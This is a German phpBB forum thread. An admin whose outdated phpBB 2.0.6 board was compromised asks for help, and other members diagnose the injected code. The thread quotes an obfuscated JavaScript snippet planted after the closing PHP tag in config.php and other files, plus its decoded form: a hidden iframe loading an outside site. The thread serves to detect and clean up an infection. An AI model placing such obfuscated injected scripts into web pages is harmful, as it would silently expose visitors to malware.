HILFE! gehackt worden?!

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
DeepThought
Mitglied
Beiträge: 17
Registriert: 04.09.2003 12:04

HILFE! gehackt worden?!

Beitrag von DeepThought »

Hallo!
ich habe da ein kleines Problem.
Seit gestern sieht mein Forum aus wie unten im Bild. die Meldungen oben sollten da nicht sein. ausserdem werden einige java applets gestartet und wenn man das ganze mit dem ie betritt ruft sich staendig der internetverbindungsdienst auf.
sieht wohl nach hack aus.

koennte mir bitte jemand sagen, was ich nun tun kann?
foren version ist 2.0.6. ich weiss, ich bin selbst dran schuld, weil ich die ganzen updates nicht geladen habe, aber das forum war fuer einige zeit in vergessenheit...bitte hilfe!

danke im voraus!

[ externes Bild ]
Mario Siebert
Mitglied
Beiträge: 2295
Registriert: 09.12.2003 15:02
Wohnort: Irgendwo im Nirgendwo

Beitrag von Mario Siebert »

Wegen der Fehlermeldung, überprüf mal ob in deiner config.php vor <?php oder nach ?> leerzeilen sind, wenn ja entfern sie.

Grüße Mario
Wer gegen eine geringe Gebühr (höhe der Gebühr bestimmst du selbst!!) ein phpBB installiert oder Mods eingebaut haben möchte sollte sich melden unter: netcom_service@gmx.net - Bisherige Aufträge 68.071
Auf Anfrage führe ich auch Reparaturen/Updates und Serverumzüge durch oder baue Mods!
DeepThought
Mitglied
Beiträge: 17
Registriert: 04.09.2003 12:04

Beitrag von DeepThought »

nein leerzeichen sind da keine aber da steht
`<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')</script>`

hinter ?> und ich bezweifle dass das da hingehoert, oder?
Mario Siebert
Mitglied
Beiträge: 2295
Registriert: 09.12.2003 15:02
Wohnort: Irgendwo im Nirgendwo

Beitrag von Mario Siebert »

Nein, das gehört da nicht hin, hier findest du ein Beispiel wie die config.php aussehen muss KB:config

Grüße Mario
Wer gegen eine geringe Gebühr (höhe der Gebühr bestimmst du selbst!!) ein phpBB installiert oder Mods eingebaut haben möchte sollte sich melden unter: netcom_service@gmx.net - Bisherige Aufträge 68.071
Auf Anfrage führe ich auch Reparaturen/Updates und Serverumzüge durch oder baue Mods!
Benutzeravatar
kellanved
Mitglied
Beiträge: 570
Registriert: 05.02.2005 15:15
Wohnort: Berlin

Beitrag von kellanved »

DeepThought hat geschrieben: ...und ich bezweifle dass das da hingehoert, oder?
Nein, aber wenn Du wissen willst, was sich in diesem Buchstabensalat versteckte:

Code: Alles auswählen

<iframe src=http://praf.sn-nei.info/index.php frameborder= width= height= scrolling= name=counter></iframe>
DeepThought
Mitglied
Beiträge: 17
Registriert: 04.09.2003 12:04

Beitrag von DeepThought »

ok, ansonsten sieht sie so aus.

so, nur wenn ich diese zeile rausloesche, dann aendert sich rein gar nichts :(

also muessen sich ja wohl noch mehr solche sachen eingeschlichen haben. wie krieg ich die jetzt alle wieder weg? :-?

danke!
Christian Benz
Mitglied
Beiträge: 854
Registriert: 25.02.2004 00:41
Wohnort: Regen
Kontaktdaten:

Beitrag von Christian Benz »

DeepThought
Mitglied
Beiträge: 17
Registriert: 04.09.2003 12:04

Beitrag von DeepThought »

also so wies aussieht steht das in jeder html und in jeder php datei die fuers forum zustaenig ist am ende drin.
2 fragen:

-gibts ne andere moeglichkeit das rauszukriegen, als die zeile in jeder einzelnen datei zu loeschen?

-wie zum teufel kommt das da hin? und wie kann ich es in zukunft vermeiden?
DeepThought
Mitglied
Beiträge: 17
Registriert: 04.09.2003 12:04

Beitrag von DeepThought »

Christian Benz hat geschrieben:Hallo,

Mein Forum wurde gecrackt - was nun?

Gruß,
Chris
ah, danke!

dann hat sich auch mein post von eben erledigt...
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“